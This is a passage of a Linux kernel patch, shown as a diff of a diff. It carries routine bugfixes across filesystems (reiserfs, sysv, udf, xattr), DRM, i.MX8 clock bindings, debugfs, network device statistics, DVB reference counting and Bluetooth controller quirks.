+ 	reiserfs_write_unlock(parent_dir->i_sb);
++	reiserfs_security_free(&security);
+ 	return retval;
+ }
+ 
+diff --git a/fs/reiserfs/xattr_security.c b/fs/reiserfs/xattr_security.c
+index 8965c8e5e172b..857a65b057264 100644
+--- a/fs/reiserfs/xattr_security.c
++++ b/fs/reiserfs/xattr_security.c
+@@ -50,6 +50,7 @@ int reiserfs_security_init(struct inode *dir, struct inode *inode,
+ 	int error;
+ 
+ 	sec->name = NULL;
++	sec->value = NULL;
+ 
+ 	/* Don't add selinux attributes on xattrs - they'll never get used */
+ 	if (IS_PRIVATE(dir))
+@@ -95,7 +96,6 @@ int reiserfs_security_write(struct reiserfs_transaction_handle *th,
+ 
+ void reiserfs_security_free(struct reiserfs_security_handle *sec)
+ {
+-	kfree(sec->name);
+ 	kfree(sec->value);
+ 	sec->name = NULL;
+ 	sec->value = NULL;
+diff --git a/fs/sysv/itree.c b/fs/sysv/itree.c
+index d4ec9bb97de95..3b8567564e7e4 100644
+--- a/fs/sysv/itree.c
++++ b/fs/sysv/itree.c
+@@ -438,7 +438,7 @@ static unsigned sysv_nblocks(struct super_block *s, loff_t size)
+ 		res += blocks;
+ 		direct = 1;
+ 	}
+-	return blocks;
++	return res;
+ }
+ 
+ int sysv_getattr(struct user_namespace *mnt_userns, const struct path *path,
+diff --git a/fs/udf/namei.c b/fs/udf/namei.c
+index ae7bc13a5298a..7c95c549dd64e 100644
+--- a/fs/udf/namei.c
++++ b/fs/udf/namei.c
+@@ -1091,8 +1091,9 @@ static int udf_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 		return -EINVAL;
+ 
+ 	ofi = udf_find_entry(old_dir, &old_dentry->d_name, &ofibh, &ocfi);
+-	if (IS_ERR(ofi)) {
+-		retval = PTR_ERR(ofi);
++	if (!ofi || IS_ERR(ofi)) {
++		if (IS_ERR(ofi))
++			retval = PTR_ERR(ofi);
+ 		goto end_rename;
+ 	}
+ 
+@@ -1101,8 +1102,7 @@ static int udf_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 
+ 	brelse(ofibh.sbh);
+ 	tloc = lelb_to_cpu(ocfi.icb.extLocation);
+-	if (!ofi || udf_get_lb_pblock(old_dir->i_sb, &tloc, 0)
+-	    != old_inode->i_ino)
++	if (udf_get_lb_pblock(old_dir->i_sb, &tloc, 0) != old_inode->i_ino)
+ 		goto end_rename;
+ 
+ 	nfi = udf_find_entry(new_dir, &new_dentry->d_name, &nfibh, &ncfi);
+diff --git a/fs/xattr.c b/fs/xattr.c
+index 61107b6bbed29..427b8cea1f968 100644
+--- a/fs/xattr.c
++++ b/fs/xattr.c
+@@ -1140,7 +1140,7 @@ static int xattr_list_one(char **buffer, ssize_t *remaining_size,
+ ssize_t simple_xattr_list(struct inode *inode, struct simple_xattrs *xattrs,
+ 			  char *buffer, size_t size)
+ {
+-	bool trusted = capable(CAP_SYS_ADMIN);
++	bool trusted = ns_capable_noaudit(&init_user_ns, CAP_SYS_ADMIN);
+ 	struct simple_xattr *xattr;
+ 	ssize_t remaining_size = size;
+ 	int err = 0;
+diff --git a/include/drm/drm_connector.h b/include/drm/drm_connector.h
+index 56aee949c6fa2..4d830fc55a3df 100644
+--- a/include/drm/drm_connector.h
++++ b/include/drm/drm_connector.h
+@@ -656,6 +656,12 @@ struct drm_display_info {
+ 	 * @mso_pixel_overlap: eDP MSO segment pixel overlap, 0-8 pixels.
+ 	 */
+ 	u8 mso_pixel_overlap;
++
++	/**
++	 * @max_dsc_bpp: Maximum DSC target bitrate, if it is set to 0 the
++	 * monitor's default value is used instead.
++	 */
++	u32 max_dsc_bpp;
+ };
+ 
+ int drm_display_info_set_bus_formats(struct drm_display_info *info,
+diff --git a/include/drm/ttm/ttm_tt.h b/include/drm/ttm/ttm_tt.h
+index 17a0310e8aaaf..b7d3f3843f1e6 100644
+--- a/include/drm/ttm/ttm_tt.h
++++ b/include/drm/ttm/ttm_tt.h
+@@ -88,7 +88,7 @@ struct ttm_tt {
+ #define TTM_TT_FLAG_EXTERNAL		(1 << 2)
+ #define TTM_TT_FLAG_EXTERNAL_MAPPABLE	(1 << 3)
+ 
+-#define TTM_TT_FLAG_PRIV_POPULATED  (1 << 31)
++#define TTM_TT_FLAG_PRIV_POPULATED  (1U << 31)
+ 	uint32_t page_flags;
+ 	/** @num_pages: Number of pages in the page array. */
+ 	uint32_t num_pages;
+diff --git a/include/dt-bindings/clock/imx8mn-clock.h b/include/dt-bindings/clock/imx8mn-clock.h
+index 07b8a282c2682..04809edab33cf 100644
+--- a/include/dt-bindings/clock/imx8mn-clock.h
++++ b/include/dt-bindings/clock/imx8mn-clock.h
+@@ -16,40 +16,48 @@
+ #define IMX8MN_CLK_EXT4				7
+ #define IMX8MN_AUDIO_PLL1_REF_SEL		8
+ #define IMX8MN_AUDIO_PLL2_REF_SEL		9
+-#define IMX8MN_VIDEO_PLL1_REF_SEL		10
++#define IMX8MN_VIDEO_PLL_REF_SEL		10
++#define IMX8MN_VIDEO_PLL1_REF_SEL		IMX8MN_VIDEO_PLL_REF_SEL
+ #define IMX8MN_DRAM_PLL_REF_SEL			11
+ #define IMX8MN_GPU_PLL_REF_SEL			12
+-#define IMX8MN_VPU_PLL_REF_SEL			13
++#define IMX8MN_M7_ALT_PLL_REF_SEL		13
++#define IMX8MN_VPU_PLL_REF_SEL			IMX8MN_M7_ALT_PLL_REF_SEL
+ #define IMX8MN_ARM_PLL_REF_SEL			14
+ #define IMX8MN_SYS_PLL1_REF_SEL			15
+ #define IMX8MN_SYS_PLL2_REF_SEL			16
+ #define IMX8MN_SYS_PLL3_REF_SEL			17
+ #define IMX8MN_AUDIO_PLL1			18
+ #define IMX8MN_AUDIO_PLL2			19
+-#define IMX8MN_VIDEO_PLL1			20
++#define IMX8MN_VIDEO_PLL			20
++#define IMX8MN_VIDEO_PLL1			IMX8MN_VIDEO_PLL
+ #define IMX8MN_DRAM_PLL				21
+ #define IMX8MN_GPU_PLL				22
+-#define IMX8MN_VPU_PLL				23
++#define IMX8MN_M7_ALT_PLL			23
++#define IMX8MN_VPU_PLL				IMX8MN_M7_ALT_PLL
+ #define IMX8MN_ARM_PLL				24
+ #define IMX8MN_SYS_PLL1				25
+ #define IMX8MN_SYS_PLL2				26
+ #define IMX8MN_SYS_PLL3				27
+ #define IMX8MN_AUDIO_PLL1_BYPASS		28
+ #define IMX8MN_AUDIO_PLL2_BYPASS		29
+-#define IMX8MN_VIDEO_PLL1_BYPASS		30
++#define IMX8MN_VIDEO_PLL_BYPASS			30
++#define IMX8MN_VIDEO_PLL1_BYPASS		IMX8MN_VIDEO_PLL_BYPASS
+ #define IMX8MN_DRAM_PLL_BYPASS			31
+ #define IMX8MN_GPU_PLL_BYPASS			32
+-#define IMX8MN_VPU_PLL_BYPASS			33
++#define IMX8MN_M7_ALT_PLL_BYPASS		33
++#define IMX8MN_VPU_PLL_BYPASS			IMX8MN_M7_ALT_PLL_BYPASS
+ #define IMX8MN_ARM_PLL_BYPASS			34
+ #define IMX8MN_SYS_PLL1_BYPASS			35
+ #define IMX8MN_SYS_PLL2_BYPASS			36
+ #define IMX8MN_SYS_PLL3_BYPASS			37
+ #define IMX8MN_AUDIO_PLL1_OUT			38
+ #define IMX8MN_AUDIO_PLL2_OUT			39
+-#define IMX8MN_VIDEO_PLL1_OUT			40
++#define IMX8MN_VIDEO_PLL_OUT			40
++#define IMX8MN_VIDEO_PLL1_OUT			IMX8MN_VIDEO_PLL_OUT
+ #define IMX8MN_DRAM_PLL_OUT			41
+ #define IMX8MN_GPU_PLL_OUT			42
+-#define IMX8MN_VPU_PLL_OUT			43
++#define IMX8MN_M7_ALT_PLL_OUT			43
++#define IMX8MN_VPU_PLL_OUT			IMX8MN_M7_ALT_PLL_OUT
+ #define IMX8MN_ARM_PLL_OUT			44
+ #define IMX8MN_SYS_PLL1_OUT			45
+ #define IMX8MN_SYS_PLL2_OUT			46
+diff --git a/include/dt-bindings/clock/imx8mp-clock.h b/include/dt-bindings/clock/imx8mp-clock.h
+index 9d5cc2ddde896..1417b7b1b7dfe 100644
+--- a/include/dt-bindings/clock/imx8mp-clock.h
++++ b/include/dt-bindings/clock/imx8mp-clock.h
+@@ -324,8 +324,9 @@
+ #define IMX8MP_CLK_CLKOUT2_SEL			317
+ #define IMX8MP_CLK_CLKOUT2_DIV			318
+ #define IMX8MP_CLK_CLKOUT2			319
++#define IMX8MP_CLK_USB_SUSP			320
+ 
+-#define IMX8MP_CLK_END				320
++#define IMX8MP_CLK_END				321
+ 
+ #define IMX8MP_CLK_AUDIOMIX_SAI1_IPG		0
+ #define IMX8MP_CLK_AUDIOMIX_SAI1_MCLK1		1
+diff --git a/include/linux/btf_ids.h b/include/linux/btf_ids.h
+index 2aea877d644f8..2b98720084285 100644
+--- a/include/linux/btf_ids.h
++++ b/include/linux/btf_ids.h
+@@ -204,7 +204,7 @@ extern struct btf_id_set8 name;
+ 
+ #else
+ 
+-#define BTF_ID_LIST(name) static u32 __maybe_unused name[5];
++#define BTF_ID_LIST(name) static u32 __maybe_unused name[16];
+ #define BTF_ID(prefix, name)
+ #define BTF_ID_FLAGS(prefix, name, ...)
+ #define BTF_ID_UNUSED
+diff --git a/include/linux/debugfs.h b/include/linux/debugfs.h
+index f60674692d365..ea2d919fd9c79 100644
+--- a/include/linux/debugfs.h
++++ b/include/linux/debugfs.h
+@@ -45,7 +45,7 @@ struct debugfs_u32_array {
+ 
+ extern struct dentry *arch_debugfs_dir;
+ 
+-#define DEFINE_DEBUGFS_ATTRIBUTE(__fops, __get, __set, __fmt)		\
++#define DEFINE_DEBUGFS_ATTRIBUTE_XSIGNED(__fops, __get, __set, __fmt, __is_signed)	\
+ static int __fops ## _open(struct inode *inode, struct file *file)	\
+ {									\
+ 	__simple_attr_check_format(__fmt, 0ull);			\
+@@ -56,10 +56,16 @@ static const struct file_operations __fops = {				\
+ 	.open	 = __fops ## _open,					\
+ 	.release = simple_attr_release,					\
+ 	.read	 = debugfs_attr_read,					\
+-	.write	 = debugfs_attr_write,					\
++	.write	 = (__is_signed) ? debugfs_attr_write_signed : debugfs_attr_write,	\
+ 	.llseek  = no_llseek,						\
+ }
+ 
++#define DEFINE_DEBUGFS_ATTRIBUTE(__fops, __get, __set, __fmt)		\
++	DEFINE_DEBUGFS_ATTRIBUTE_XSIGNED(__fops, __get, __set, __fmt, false)
++
++#define DEFINE_DEBUGFS_ATTRIBUTE_SIGNED(__fops, __get, __set, __fmt)	\
++	DEFINE_DEBUGFS_ATTRIBUTE_XSIGNED(__fops, __get, __set, __fmt, true)
++
+ typedef struct vfsmount *(*debugfs_automount_t)(struct dentry *, void *);
+ 
+ #if defined(CONFIG_DEBUG_FS)
+@@ -102,6 +108,8 @@ ssize_t debugfs_attr_read(struct file *file, char __user *buf,
+ 			size_t len, loff_t *ppos);
+ ssize_t debugfs_attr_write(struct file *file, const char __user *buf,
+ 			size_t len, loff_t *ppos);
++ssize_t debugfs_attr_write_signed(struct file *file, const char __user *buf,
++			size_t len, loff_t *ppos);
+ 
+ struct dentry *debugfs_rename(struct dentry *old_dir, struct dentry *old_dentry,
+                 struct dentry *new_dir, const char *new_name);
+@@ -254,6 +262,13 @@ static inline ssize_t debugfs_attr_write(struct file *file,
+ 	return -ENODEV;
+ }
+ 
++static inline ssize_t debugfs_attr_write_signed(struct file *file,
++					const char __user *buf,
++					size_t len, loff_t *ppos)
++{
++	return -ENODEV;
++}
++
+ static inline struct dentry *debugfs_rename(struct dentry *old_dir, struct dentry *old_dentry,
+                 struct dentry *new_dir, char *new_name)
+ {
+diff --git a/include/linux/eventfd.h b/include/linux/eventfd.h
+index 30eb30d6909b0..3cd202d3eefb3 100644
+--- a/include/linux/eventfd.h
++++ b/include/linux/eventfd.h
+@@ -61,7 +61,7 @@ static inline struct eventfd_ctx *eventfd_ctx_fdget(int fd)
+ 	return ERR_PTR(-ENOSYS);
+ }
+ 
+-static inline int eventfd_signal(struct eventfd_ctx *ctx, int n)
++static inline int eventfd_signal(struct eventfd_ctx *ctx, __u64 n)
+ {
+ 	return -ENOSYS;
+ }
+diff --git a/include/linux/fortify-string.h b/include/linux/fortify-string.h
+index 1067a8450826b..5001a11258e4d 100644
+--- a/include/linux/fortify-string.h
++++ b/include/linux/fortify-string.h
+@@ -18,7 +18,7 @@ void __write_overflow_field(size_t avail, size_t wanted) __compiletime_warning("
+ 
+ #define __compiletime_strlen(p)					\
+ ({								\
+-	unsigned char *__p = (unsigned char *)(p);		\
++	char *__p = (char *)(p);				\
+ 	size_t __ret = SIZE_MAX;				\
+ 	size_t __p_size = __member_size(p);			\
+ 	if (__p_size != SIZE_MAX &&				\
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 59ae95ddb6793..6b115bce14b98 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -3493,7 +3493,7 @@ void simple_transaction_set(struct file *file, size_t n);
+  * All attributes contain a text representation of a numeric value
+  * that are accessed with the get() and set() functions.
+  */
+-#define DEFINE_SIMPLE_ATTRIBUTE(__fops, __get, __set, __fmt)		\
++#define DEFINE_SIMPLE_ATTRIBUTE_XSIGNED(__fops, __get, __set, __fmt, __is_signed)	\
+ static int __fops ## _open(struct inode *inode, struct file *file)	\
+ {									\
+ 	__simple_attr_check_format(__fmt, 0ull);			\
+@@ -3504,10 +3504,16 @@ static const struct file_operations __fops = {				\
+ 	.open	 = __fops ## _open,					\
+ 	.release = simple_attr_release,					\
+ 	.read	 = simple_attr_read,					\
+-	.write	 = simple_attr_write,					\
++	.write	 = (__is_signed) ? simple_attr_write_signed : simple_attr_write,	\
+ 	.llseek	 = generic_file_llseek,					\
+ }
+ 
++#define DEFINE_SIMPLE_ATTRIBUTE(__fops, __get, __set, __fmt)		\
++	DEFINE_SIMPLE_ATTRIBUTE_XSIGNED(__fops, __get, __set, __fmt, false)
++
++#define DEFINE_SIMPLE_ATTRIBUTE_SIGNED(__fops, __get, __set, __fmt)	\
++	DEFINE_SIMPLE_ATTRIBUTE_XSIGNED(__fops, __get, __set, __fmt, true)
++
+ static inline __printf(1, 2)
+ void __simple_attr_check_format(const char *fmt, ...)
+ {
+@@ -3522,6 +3528,8 @@ ssize_t simple_attr_read(struct file *file, char __user *buf,
+ 			 size_t len, loff_t *ppos);
+ ssize_t simple_attr_write(struct file *file, const char __user *buf,
+ 			  size_t len, loff_t *ppos);
++ssize_t simple_attr_write_signed(struct file *file, const char __user *buf,
++				 size_t len, loff_t *ppos);
+ 
+ struct ctl_table;
+ int __init list_bdev_fs_names(char *buf, size_t size);
+diff --git a/include/linux/hisi_acc_qm.h b/include/linux/hisi_acc_qm.h
+index e230c7c46110a..c3618255b1504 100644
+--- a/include/linux/hisi_acc_qm.h
++++ b/include/linux/hisi_acc_qm.h
+@@ -384,14 +384,14 @@ struct hisi_qp {
+ static inline int q_num_set(const char *val, const struct kernel_param *kp,
+ 			    unsigned int device)
+ {
+-	struct pci_dev *pdev = pci_get_device(PCI_VENDOR_ID_HUAWEI,
+-					      device, NULL);
++	struct pci_dev *pdev;
+ 	u32 n, q_num;
+ 	int ret;
+ 
+ 	if (!val)
+ 		return -EINVAL;
+ 
++	pdev = pci_get_device(PCI_VENDOR_ID_HUAWEI, device, NULL);
+ 	if (!pdev) {
+ 		q_num = min_t(u32, QM_QNUM_V1, QM_QNUM_V2);
+ 		pr_info("No device found currently, suppose queue number is %u\n",
+@@ -401,6 +401,8 @@ static inline int q_num_set(const char *val, const struct kernel_param *kp,
+ 			q_num = QM_QNUM_V1;
+ 		else
+ 			q_num = QM_QNUM_V2;
++
++		pci_dev_put(pdev);
+ 	}
+ 
+ 	ret = kstrtou32(val, 10, &n);
+diff --git a/include/linux/hyperv.h b/include/linux/hyperv.h
+index 3b42264333ef8..646f1da9f27e0 100644
+--- a/include/linux/hyperv.h
++++ b/include/linux/hyperv.h
+@@ -1341,6 +1341,8 @@ struct hv_ring_buffer_debug_info {
+ int hv_ringbuffer_get_debuginfo(struct hv_ring_buffer_info *ring_info,
+ 				struct hv_ring_buffer_debug_info *debug_info);
+ 
++bool hv_ringbuffer_spinlock_busy(struct vmbus_channel *channel);
++
+ /* Vmbus interface */
+ #define vmbus_driver_register(driver)	\
+ 	__vmbus_driver_register(driver, THIS_MODULE, KBUILD_MODNAME)
+diff --git a/include/linux/ieee80211.h b/include/linux/ieee80211.h
+index 79690938d9a2d..d3088666f3f44 100644
+--- a/include/linux/ieee80211.h
++++ b/include/linux/ieee80211.h
+@@ -4594,7 +4594,7 @@ static inline u8 ieee80211_mle_common_size(const u8 *data)
+ 		return 0;
+ 	}
+ 
+-	return common + mle->variable[0];
++	return sizeof(*mle) + common + mle->variable[0];
+ }
+ 
+ /**
+diff --git a/include/linux/iio/imu/adis.h b/include/linux/iio/imu/adis.h
+index 515ca09764fe4..bcbefb7574751 100644
+--- a/include/linux/iio/imu/adis.h
++++ b/include/linux/iio/imu/adis.h
+@@ -402,9 +402,20 @@ static inline int adis_update_bits_base(struct adis *adis, unsigned int reg,
+ 	__adis_update_bits_base(adis, reg, mask, val, sizeof(val));	\
+ })
+ 
+-int adis_enable_irq(struct adis *adis, bool enable);
+ int __adis_check_status(struct adis *adis);
+ int __adis_initial_startup(struct adis *adis);
++int __adis_enable_irq(struct adis *adis, bool enable);
++
++static inline int adis_enable_irq(struct adis *adis, bool enable)
++{
++	int ret;
++
++	mutex_lock(&adis->state_lock);
++	ret = __adis_enable_irq(adis, enable);
++	mutex_unlock(&adis->state_lock);
++
++	return ret;
++}
+ 
+ static inline int adis_check_status(struct adis *adis)
+ {
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index eddf8ee270e74..ba2bd604359d4 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -171,31 +171,38 @@ static inline bool dev_xmit_complete(int rc)
+  *	(unsigned long) so they can be read and written atomically.
+  */
+ 
++#define NET_DEV_STAT(FIELD)			\
++	union {					\
++		unsigned long FIELD;		\
++		atomic_long_t __##FIELD;	\
++	}
++
+ struct net_device_stats {
+-	unsigned long	rx_packets;
+-	unsigned long	tx_packets;
+-	unsigned long	rx_bytes;
+-	unsigned long	tx_bytes;
+-	unsigned long	rx_errors;
+-	unsigned long	tx_errors;
+-	unsigned long	rx_dropped;
+-	unsigned long	tx_dropped;
+-	unsigned long	multicast;
+-	unsigned long	collisions;
+-	unsigned long	rx_length_errors;
+-	unsigned long	rx_over_errors;
+-	unsigned long	rx_crc_errors;
+-	unsigned long	rx_frame_errors;
+-	unsigned long	rx_fifo_errors;
+-	unsigned long	rx_missed_errors;
+-	unsigned long	tx_aborted_errors;
+-	unsigned long	tx_carrier_errors;
+-	unsigned long	tx_fifo_errors;
+-	unsigned long	tx_heartbeat_errors;
+-	unsigned long	tx_window_errors;
+-	unsigned long	rx_compressed;
+-	unsigned long	tx_compressed;
++	NET_DEV_STAT(rx_packets);
++	NET_DEV_STAT(tx_packets);
++	NET_DEV_STAT(rx_bytes);
++	NET_DEV_STAT(tx_bytes);
++	NET_DEV_STAT(rx_errors);
++	NET_DEV_STAT(tx_errors);
++	NET_DEV_STAT(rx_dropped);
++	NET_DEV_STAT(tx_dropped);
++	NET_DEV_STAT(multicast);
++	NET_DEV_STAT(collisions);
++	NET_DEV_STAT(rx_length_errors);
++	NET_DEV_STAT(rx_over_errors);
++	NET_DEV_STAT(rx_crc_errors);
++	NET_DEV_STAT(rx_frame_errors);
++	NET_DEV_STAT(rx_fifo_errors);
++	NET_DEV_STAT(rx_missed_errors);
++	NET_DEV_STAT(tx_aborted_errors);
++	NET_DEV_STAT(tx_carrier_errors);
++	NET_DEV_STAT(tx_fifo_errors);
++	NET_DEV_STAT(tx_heartbeat_errors);
++	NET_DEV_STAT(tx_window_errors);
++	NET_DEV_STAT(rx_compressed);
++	NET_DEV_STAT(tx_compressed);
+ };
++#undef NET_DEV_STAT
+ 
+ /* per-cpu stats, allocated on demand.
+  * Try to fit them in a single cache line, for dev_get_stats() sake.
+@@ -5164,4 +5171,9 @@ extern struct list_head ptype_base[PTYPE_HASH_SIZE] __read_mostly;
+ 
+ extern struct net_device *blackhole_netdev;
+ 
++/* Note: Avoid these macros in fast path, prefer per-cpu or per-queue counters. */
++#define DEV_STATS_INC(DEV, FIELD) atomic_long_inc(&(DEV)->stats.__##FIELD)
++#define DEV_STATS_ADD(DEV, FIELD, VAL) 	\
++		atomic_long_add((VAL), &(DEV)->stats.__##FIELD)
++
+ #endif	/* _LINUX_NETDEVICE_H */
+diff --git a/include/linux/proc_fs.h b/include/linux/proc_fs.h
+index 81d6e4ec2294b..0260f5ea98fe1 100644
+--- a/include/linux/proc_fs.h
++++ b/include/linux/proc_fs.h
+@@ -208,8 +208,10 @@ static inline void proc_remove(struct proc_dir_entry *de) {}
+ static inline int remove_proc_subtree(const char *name, struct proc_dir_entry *parent) { return 0; }
+ 
+ #define proc_create_net_data(name, mode, parent, ops, state_size, data) ({NULL;})
++#define proc_create_net_data_write(name, mode, parent, ops, write, state_size, data) ({NULL;})
+ #define proc_create_net(name, mode, parent, state_size, ops) ({NULL;})
+ #define proc_create_net_single(name, mode, parent, show, data) ({NULL;})
++#define proc_create_net_single_write(name, mode, parent, show, write, data) ({NULL;})
+ 
+ static inline struct pid *tgid_pidfd_to_pid(const struct file *file)
+ {
+diff --git a/include/linux/regulator/driver.h b/include/linux/regulator/driver.h
+index f9a7461e72b80..d3b4a3d4514ab 100644
+--- a/include/linux/regulator/driver.h
++++ b/include/linux/regulator/driver.h
+@@ -687,7 +687,8 @@ static inline int regulator_err2notif(int err)
+ 
+ 
+ struct regulator_dev *
+-regulator_register(const struct regulator_desc *regulator_desc,
++regulator_register(struct device *dev,
++		   const struct regulator_desc *regulator_desc,
+ 		   const struct regulator_config *config);
+ struct regulator_dev *
+ devm_regulator_register(struct device *dev,
+diff --git a/include/linux/skmsg.h b/include/linux/skmsg.h
+index 70d6cb94e5802..84f787416a54d 100644
+--- a/include/linux/skmsg.h
++++ b/include/linux/skmsg.h
+@@ -82,6 +82,7 @@ struct sk_psock {
+ 	u32				apply_bytes;
+ 	u32				cork_bytes;
+ 	u32				eval;
++	bool				redir_ingress; /* undefined if sk_redir is null */
+ 	struct sk_msg			*cork;
+ 	struct sk_psock_progs		progs;
+ #if IS_ENABLED(CONFIG_BPF_STREAM_PARSER)
+diff --git a/include/linux/timerqueue.h b/include/linux/timerqueue.h
+index 93884086f3924..adc80e29168ea 100644
+--- a/include/linux/timerqueue.h
++++ b/include/linux/timerqueue.h
+@@ -35,7 +35,7 @@ struct timerqueue_node *timerqueue_getnext(struct timerqueue_head *head)
+ {
+ 	struct rb_node *leftmost = rb_first_cached(&head->rb_root);
+ 
+-	return rb_entry(leftmost, struct timerqueue_node, node);
++	return rb_entry_safe(leftmost, struct timerqueue_node, node);
+ }
+ 
+ static inline void timerqueue_init(struct timerqueue_node *node)
+diff --git a/include/media/dvbdev.h b/include/media/dvbdev.h
+index 2f6b0861322ae..ac60c9fcfe9a6 100644
+--- a/include/media/dvbdev.h
++++ b/include/media/dvbdev.h
+@@ -126,6 +126,7 @@ struct dvb_adapter {
+  * struct dvb_device - represents a DVB device node
+  *
+  * @list_head:	List head with all DVB devices
++ * @ref:	reference counter
+  * @fops:	pointer to struct file_operations
+  * @adapter:	pointer to the adapter that holds this device node
+  * @type:	type of the device, as defined by &enum dvb_device_type.
+@@ -156,6 +157,7 @@ struct dvb_adapter {
+  */
+ struct dvb_device {
+ 	struct list_head list_head;
++	struct kref ref;
+ 	const struct file_operations *fops;
+ 	struct dvb_adapter *adapter;
+ 	enum dvb_device_type type;
+@@ -187,6 +189,20 @@ struct dvb_device {
+ 	void *priv;
+ };
+ 
++/**
++ * dvb_device_get - Increase dvb_device reference
++ *
++ * @dvbdev:	pointer to struct dvb_device
++ */
++struct dvb_device *dvb_device_get(struct dvb_device *dvbdev);
++
++/**
++ * dvb_device_put - Decrease dvb_device reference
++ *
++ * @dvbdev:	pointer to struct dvb_device
++ */
++void dvb_device_put(struct dvb_device *dvbdev);
++
+ /**
+  * dvb_register_adapter - Registers a new DVB adapter
+  *
+@@ -231,29 +247,17 @@ int dvb_register_device(struct dvb_adapter *adap,
+ /**
+  * dvb_remove_device - Remove a registered DVB device
+  *
+- * This does not free memory.  To do that, call dvb_free_device().
++ * This does not free memory. dvb_free_device() will do that when
++ * reference counter is empty
+  *
+  * @dvbdev:	pointer to struct dvb_device
+  */
+ void dvb_remove_device(struct dvb_device *dvbdev);
+ 
+-/**
+- * dvb_free_device - Free memory occupied by a DVB device.
+- *
+- * Call dvb_unregister_device() before calling this function.
+- *
+- * @dvbdev:	pointer to struct dvb_device
+- */
+-void dvb_free_device(struct dvb_device *dvbdev);
+ 
+ /**
+  * dvb_unregister_device - Unregisters a DVB device
+  *
+- * This is a combination of dvb_remove_device() and dvb_free_device().
+- * Using this function is usually a mistake, and is often an indicator
+- * for a use-after-free bug (when a userspace process keeps a file
+- * handle to a detached device).
+- *
+  * @dvbdev:	pointer to struct dvb_device
+  */
+ void dvb_unregister_device(struct dvb_device *dvbdev);
+diff --git a/include/net/bluetooth/hci.h b/include/net/bluetooth/hci.h
+index 684f1cd287301..7a381fcef939d 100644
+--- a/include/net/bluetooth/hci.h
++++ b/include/net/bluetooth/hci.h
+@@ -274,6 +274,26 @@ enum {
+ 	 * during the hdev->setup vendor callback.
+ 	 */
+ 	HCI_QUIRK_BROKEN_ENHANCED_SETUP_SYNC_CONN,
++
++	/*
++	 * When this quirk is set, the HCI_OP_LE_SET_EXT_SCAN_ENABLE command is
++	 * disabled. This is required for some Broadcom controllers which
++	 * erroneously claim to support extended scanning.
++	 *
++	 * This quirk can be set before hci_register_dev is called or
++	 * during the hdev->setup vendor callback.
++	 */
++	HCI_QUIRK_BROKEN_EXT_SCAN,
++
++	/*
++	 * When this quirk is set, the HCI_OP_GET_MWS_TRANSPORT_CONFIG command is
++	 * disabled. This is required for some Broadcom controllers which
++	 * erroneously claim to support MWS Transport Layer Configuration.
++	 *
++	 * This quirk can be set before hci_register_dev is called or
++	 * during the hdev->setup vendor callback.
++	 */
++	HCI_QUIRK_BROKEN_MWS_TRANSPORT_CONFIG,
+ };
+ 
+ /* HCI device flags */
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index c54bc71254afa..7f585e5dd71b8 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -1689,7 +1689,9 @@ void hci_conn_del_sysfs(struct hci_conn *conn);
+ 
+ /* Use ext scanning if set ext scan param and ext scan enable is supported */
+ #define use_ext_scan(dev) (((dev)->commands[37] & 0x20) && \
+-			   ((dev)->commands[37] & 0x40))
++			   ((dev)->commands[37] & 0x40) && \
++			   !test_bit(HCI_QUIRK_BROKEN_EXT_SCAN, &(dev)->quirks))
++
+ /* Use ext create connection if command is supported */
+ #define use_ext_conn(dev) ((dev)->commands[37] & 0x80)
+ 
+@@ -1717,6 +1719,9 @@ void hci_conn_del_sysfs(struct hci_conn *conn);
+ 	((dev)->le_features[3] & HCI_LE_CIS_PERIPHERAL)
+ #define bis_capable(dev) ((dev)->le_features[3] & HCI_LE_ISO_BROADCASTER)
+ 
++#define mws_transport_config_capable(dev) (((dev)->commands[30] & 0x08) && \
++	(!test_bit(HCI_QUIRK_BROKEN_MWS_TRANSPORT_CONFIG, &(dev)->quirks)))
++
+ /* ----- HCI protocols ----- */
+ #define HCI_PROTO_DEFER             0x01
+ 
+diff --git a/include/net/dst.h b/include/net/dst.h
+index 00b479ce6b99c..d67fda89cd0fa 100644
+--- a/include/net/dst.h
++++ b/include/net/dst.h
+@@ -356,9 +356,8 @@ static inline void __skb_tunnel_rx(struct sk_buff *skb, struct net_device *dev,
+ static inline void skb_tunnel_rx(struct sk_buff *skb, struct net_device *dev,
+ 				 struct net *net)
+ {
+-	/* TODO : stats should be SMP safe */
+-	dev->stats.rx_packets++;
+-	dev->stats.rx_bytes += skb->len;
++	DEV_STATS_INC(dev, rx_packets);
++	DEV_STATS_ADD(dev, rx_bytes, skb->len);
+ 	__skb_tunnel_rx(skb, dev, net);
+ }
+ 
+diff --git a/include/net/ip_vs.h b/include/net/ip_vs.h
+index ff1804a0c4692..1fca6a88114ad 100644
+--- a/include/net/ip_vs.h
++++ b/include/net/ip_vs.h
+@@ -351,11 +351,11 @@ struct ip_vs_seq {
+ 
+ /* counters per cpu */
+ struct ip_vs_counters {
+-	__u64		conns;		/* connections scheduled */
+-	__u64		inpkts;		/* incoming packets */
+-	__u64		outpkts;	/* outgoing packets */
+-	__u64		inbytes;	/* incoming bytes */
+-	__u64		outbytes;	/* outgoing bytes */
++	u64_stats_t	conns;		/* connections scheduled */
++	u64_stats_t	inpkts;		/* incoming packets */
++	u64_stats_t	outpkts;	/* outgoing packets */
++	u64_stats_t	inbytes;	/* incoming bytes */
++	u64_stats_t	outbytes;	/* outgoing bytes */
+ };
+ /* Stats per cpu */
+ struct ip_vs_cpu_stats {
+diff --git a/include/net/mrp.h b/include/net/mrp.h
+index 92cd3fb6cf9da..b28915ffea284 100644
+--- a/include/net/mrp.h
++++ b/include/net/mrp.h
+@@ -124,6 +124,7 @@ struct mrp_applicant {
+ 	struct sk_buff		*pdu;
+ 	struct rb_root		mad;
+ 	struct rcu_head		rcu;
++	bool			active;
+ };
+ 
+ struct mrp_port {
+diff --git a/include/net/sock_reuseport.h b/include/net/sock_reuseport.h
+index efc9085c68927..6ec140b0a61bf 100644
+--- a/include/net/sock_reuseport.h
++++ b/include/net/sock_reuseport.h
+@@ -16,6 +16,7 @@ struct sock_reuseport {
+ 	u16			max_socks;		/* length of socks */
